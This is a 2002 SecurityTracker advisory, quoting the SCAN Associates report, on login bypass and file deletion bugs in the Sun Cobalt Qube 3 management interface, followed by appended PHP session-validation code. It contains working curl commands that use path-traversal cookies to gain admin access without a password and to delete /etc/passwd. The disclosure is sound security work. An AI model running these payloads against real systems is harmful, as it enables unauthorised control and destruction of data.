SecurityTracker.com





Category:  Device (Embedded Server/Appliance)  >  Qube
Vendors:  Sun
Sun Cobalt Qube 3 Appliance Access Control Bugs Let Remote Users Access New User Accounts or Delete Files on the System and Let Local Users Gain 'Admin' Privileges
SecurityTracker Alert ID:  1004837
CVE Reference:  CAN-2002-1058
Updated:  Feb 21 2004
Original Entry Date:  Jul 25 2002
Impact:  Denial of service via network, Modification of system information, Modification of user information, Root access via local system, User access via network
Exploit Included:  Yes  
Version(s): Qube 3; Cobalt Linux release 6.0 (Carmel) Kernel 2.2.16C7
Description:  Several access control vulnerabilities were reported in the Cobalt Qube 3 system management interface. A remote user may be able to obtain administrative access on the management interface.

It is reported that a local user with the ability to create files on the server can create a specially crafted file at '/tmp/test' to mimic an authentication cookie. A demonstration exploit command is provided:

$ printf "admin" > /tmp/test

This allows a remote user to log in with 'admin' privileges without supplying a password, using a command of the following type [using the 'curl' command-line tool]:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php

It is also reported that if a user account has been newly created, a remote user can log in without supplying authentication credentials:

$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php

According to the report, any remote user can delete arbitrary files on the server by specifying the path to the file and the first 31 characters of the file name. A demonstration exploit command that deletes the /etc/passwd file from the server is provided:

$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php

The vendor has reportedly been notified.

Impact:  A remote user can log in to a newly created account without supplying a password. A remote user can delete arbitrary files from the server. A local user can gain 'admin' privileges.
Solution:  No solution was available at the time of this entry.

The authors of the report have provided the following quick solution:

/usr/sausalito/ui/libPhp/ServerScriptHelper.php

line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);

Vendor URL:  www.sun.com/hardware/serverappliances/qube3/index.html
Cause:  Access control error
Reported By:  pokley <saleh@scan-associates.net>
Message History:   None.


 Source Message Contents

Date:  Wed, 24 Jul 2002 09:40:01 +0800
From:  pokley <saleh@scan-associates.net>
Subject:  Cobalt Qube 3 Administration page

 



SCAN Associates Sdn Bhd Security Advisory


Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel) Kernel 2.2.16C7 on
an i586)

Date: 23rd July 2002

Summary: Bypass login

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>


Description
===========
First of all, we would like to thank Sun Microsystems (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
to receive this cool box. After playing around for a while, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We alerted security-alert@sun.com and Sun
Microsystems (Malaysia) on 19th July but unfortunately we did not receive any
feedback.

Details
=======

Problem 1: Local Privilege Escalation to Admin

Any user with the ability to create a file in any location on a Cobalt server
will be able to promote themselves to Admin access of the System Management.
A user may create a file in /tmp/test and craft a cookie to log in as Admin
without a password:

Create a dummy session file on the Cobalt server:

$ printf "admin" > /tmp/test

Log in without a password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php


Problem 2: Remote User access

We also found out that if the User account is newly created, we can bypass
the authentication without needing to create a dummy session file on the
server:

$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php


Problem 3: Remotely delete file

It is possible to delete a file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:

$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php


Quick Solution
==============

/usr/sausalito/ui/libPhp/ServerScriptHelper.php

line 64: 
$sessionId = ereg_replace("\.\.","",$sessionId);



* - curl can be downloaded from http://curl.haxx.se/download.html


www.scan-associates.net
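
The Quick Solution above repairs the sessionId cookie by stripping ".." from it; the stricter form of the same check rejects any value that is not shaped like a generated session ID and confirms that the resolved file sits inside the session directory. The following is an added example, not code from the advisory or from Cobalt: the session directory, the ID format and the function names are assumptions, and preg_replace stands in for ereg_replace.

```php
<?php
// Added example, not Cobalt/Sausalito code. The session directory and the ID
// format (16-64 letters and digits) are assumptions made for illustration.

// The advisory's quick fix, written with preg_replace because ereg_replace
// no longer exists in current PHP: it repairs the value instead of rejecting.
function quick_fix_strip($sessionId)
{
    return preg_replace('/\.\./', '', $sessionId);
}

// Allow-list alternative: return the canonical session file path, or false.
function resolve_session_file($sessionDir, $sessionId)
{
    if (!is_string($sessionId)
        || preg_match('/\A[A-Za-z0-9]{16,64}\z/', $sessionId) !== 1) {
        return false;                        // not shaped like a generated ID
    }
    $base = realpath($sessionDir);
    $path = realpath($sessionDir . '/' . $sessionId);
    if ($base === false || $path === false) {
        return false;                        // directory or session missing
    }
    // Containment check on the resolved path (symlinks and ".." removed).
    if (dirname($path) !== $base || !is_file($path)) {
        return false;
    }
    return $path;
}

// Constructed demo data: a throwaway directory holding one valid session.
$dir = sys_get_temp_dir() . '/sess_demo_' . getmypid();
mkdir($dir, 0700);
$validId = 'A1b2C3d4E5f6G7h8';
file_put_contents($dir . '/' . $validId, 'admin');

$candidates = array(
    $validId,                                // well-formed and present
    'Z9y8X7w6V5u4T3s2',                      // well-formed but no such file
    '/../../../../../../tmp/test',           // cookie value from Problem 1
    '../codb/objects/4/.name',               // cookie value from Problem 2
    '../../../../../../../../etc/passwd',    // cookie value from Problem 3
);
foreach ($candidates as $id) {
    $verdict = resolve_session_file($dir, $id) === false ? 'rejected' : 'accepted';
    printf("%-38s strip=%-20s %s\n", $id, quick_fix_strip($id), $verdict);
}
unlink($dir . '/' . $validId);
rmdir($dir);
```

The stripped values in the middle column still contain path separators, which is why the allow-list rejects them outright rather than trying to repair them.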










 



Copyright 2004, SecurityGlobal.net LLC